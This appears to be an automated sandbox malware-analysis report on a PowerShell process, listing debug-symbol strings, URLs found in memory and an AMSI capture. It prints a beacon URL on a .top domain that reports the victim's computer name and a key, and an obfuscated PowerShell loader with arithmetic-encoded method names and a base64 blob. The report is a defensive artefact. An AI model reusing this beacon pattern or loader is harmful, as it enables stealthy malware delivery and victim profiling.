Source: | Binary string: softy.pdb source: powershell.exe, 00000000.00000002.27842329048.00000252DE1F6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.27842329048.00000252DE1F6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.27726550491.00000252C5D60000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.27842329048.00000252DE1F6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdbX source: powershell.exe, 00000000.00000002.27724622303.00000252C3F42000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdbgS source: powershell.exe, 00000000.00000002.27838953608.00000252DE1A7000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 6?t.Automation.pdb source: powershell.exe, 00000000.00000002.27838953608.00000252DE117000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdb~ source: powershell.exe, 00000000.00000002.27838953608.00000252DE117000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbc source: powershell.exe, 00000000.00000002.27838953608.00000252DE137000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000000.00000002.27842329048.00000252DE1F6000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C719D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$tjwe1cgqifoz4l3/$6tmq9zsu3l0ofg4.php? |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C719D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C6E75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C7033000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$tjwe1cgqifoz4l3/$6tmq9zsu3l0ofg4.php?id=$env:computername&key=$nwbirdhamkxfje&s=527 |
Source: powershell.exe, 00000000.00000002.27726550491.00000252C5DBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.27726550491.00000252C5DBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.27838953608.00000252DE137000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m |
Source: powershell.exe, 00000000.00000002.27844464646.00000252DE2B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr3P#St |
Source: powershell.exe, 00000000.00000002.27726550491.00000252C5E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micrP |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C7003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C6E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kdemjgebjimkanl.top |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C6E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kdemjgebjimkanl.top/4qai6vxy03htr.php?id=computer&key=89124909218&s=527 |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C6E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kdemjgebjimkanl.top/4qai6vxy03htr.php?id=computer&key=89124909218&s=527p |
Source: powershell.exe, 00000000.00000002.27823716821.00000252D6015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C92EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C9177000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C61CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C91A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C9177000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngh |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C61CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C5FA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C61CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C8C97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C9177000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C61CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C91A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C9177000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C7003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C700D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C7021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C7033000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C7021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZnuGKn0yrsGIjAOasl8i-P20bGUT9uRuu5WIIumw8Z7ILuRRy25SfocDVyqiTvCTFS2yXt |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C700D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZnuGKn0yrsGIjAOasl8i-P20bGU |
Source: powershell.exe, 00000000.00000002.27726550491.00000252C5E17000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27842329048.00000252DE1F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft. |
Source: powershell.exe, 00000000.00000002.27726550491.00000252C5DBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C5FA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C92EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C92EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C92EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C700D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C9177000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C61CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C91A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C9177000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pesterh |
Source: powershell.exe, 00000000.00000002.27823716821.00000252D6015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C92EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.27726550491.00000252C5DBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C8C97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000000.00000002.27727598878.00000252C7003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C7021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.27727598878.00000252C7033000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $vws3l6gj5oybp1t.(([system.String]::new(@((3501-(4859110/1415)),(-7147+(6212+1046)),(332864/2972),(352715/(8422-(-1154+6661))),(-3618+(32659044/8822)),(-3992+(-3127+7230))))))( $lmwog3a4byc7z5d ) $vws3l6gj5oybp1t.(([system.String]::new(@((412117/6151),(4341-4233),(149184/1344),(-426+541),(941421/9321)))))()$gjpcd91vshno372.(([char[]]@((654657/9771),(-9956+(99804688/9917)),(305694/(9256-6502)),(705985/(2527+(11991840/3320))),(-8435+(306+8230))) -join ''))()[byte[]] $qk5tjuw9ngo0xf1 = $lmwog3a4byc7z5d.(([system.String]::new(@((838656/9984),(8216-(4887315/(4612950/(105+(11294-(13784-10035)))))),(-239+(324976/1069)),(-6170+6284),(1025544/(9908-(-505+1417))),(800153/(14695-6446)),(582978/(9270-4452))))))() $2kz9pblfo8ruq1d=$qk5tjuw9ngo0xf1 return $2kz9pblfo8ruq1d}[System.Text.Encoding]::ascii.(([system.String]::new(@((8987-8916),(-5126+(5796743/1109)),(-9947+(17989-(23262810/(11120-8185)))),(215800/(10283000/3955)),(7513-(1791+5606)),(-8929+(22191522/2454)),(-3550+3655),(-3921+(5973-1942)),(-7694+(4389711/(-6151+6714)))))))((guzwyhi85ros4cblt9jmdxpq7n2 "Lup/ZGhrMjdxZo316O9rMxrtnXo1iWh561IiqiGN6yBk4jXlDN+FaAg2ynVlaqpDo6zS/wI9ubzREc+e9qgdUv99dzbjYqg0rPS8XXmUICbcyVYUVJ7pWBIdTMir1Vf3DxiPjK+omcyO3R+S5ppw8++4wYRygV/uzIq0+fvMPemZqac1bb+qmo+VAsii7Yf3Dh4GHbA0TkzNEYAViNrKmYBHhYCq20Saw9EIGpOw8fKcv5uGjpiRCJcByViuC5ccX1Sbmtpml3HC4iyQiq6yqbNS1N/SslO1wDi+qaewakTs0B2QCQ48DwbljM6oKD9NP8kevabVhgMYG3PcZXbhyZ9SQk8/s6+z8/PUz9OeCfbSX0HGuuedF8agBEIigNjibPScERVzcRiog44ZBijI/AOeiH2/Q/S1S7bw5SOlE6HfZUD9DwwcrrTd1ailGmbRxDftjyMDl7gOruES9gzwvFFVZCnYF3uTZA5WXxZ8mLymUP3/Wsky63Agq117Dw+XiBj2bwNTpSPou2ZGCzyBRRskHmrp28vY6KSRtIv/buEqxfMQ6wfhC2ZSCYw4iXqO+syypPoeaamv++twjMoLfpD+r/7ChB62WtcKCUHPF3PqCi/0Ogym/YX5k4X9VeN0acvhP4Pl51ESnwAv3BPdeHgAU1qTsDKYobqNsN5maD6Dyr65afsl1t+kUZkmTHYuXIZQg88MKWEWJYT8AwompnwWg3QMSN+xqI1/+CITpmuBH1sy1wwfRc2/ujcb4aWKaDJUBuowuuXDuH3A7yzyab7xgvEWoeN1+jnmNJAKaVXuPgeOqgo8huaG+faAUlfS1sfdxl3RItFjPSHO38AgiRUal0RqzxxSUk8GKjG8ubKNg8vHjhLndksa9O8mz7zE31mBrkXaRqJYREYLwzIb2Xf8gydxilsIFJVk3a6KE9IlcAdLCpL0tltPaYW/tQFMcrIiV8H6pa/M+eVGqt7qO5SsjzD6gUe1TtMIFLCXjs6bp9sSJr7omIeNZRmDs5X+ni94a3YEfTli8cO0/j6qns/0nRcQVdcW7Q0u2PC3fk/S+/npZ8F8cHLy4GSnG8fTyJiTiL2W4bxqeOcSz5WCp0+Q2xkqgwnbvtxjthqwJm8gN3N3yghsHiBRsvKiy9Yf4jfIZVChoM7oGM7X11eyJEqnaZIelpZhSOMlBk4eOvrjarQLEQ00rDnUwiHcQkv0secUAob9n3Jt5+8Dn6Uua+a+P9e9og4dCqUENzuZ67qauuG1jrmoHxIMwdyyzUubwb/E85NwrKlJh0GxvYX3amiuM7+wXcrKFCDsdkRGh6EEP9dioHMrSGqnFAOWnmoVO |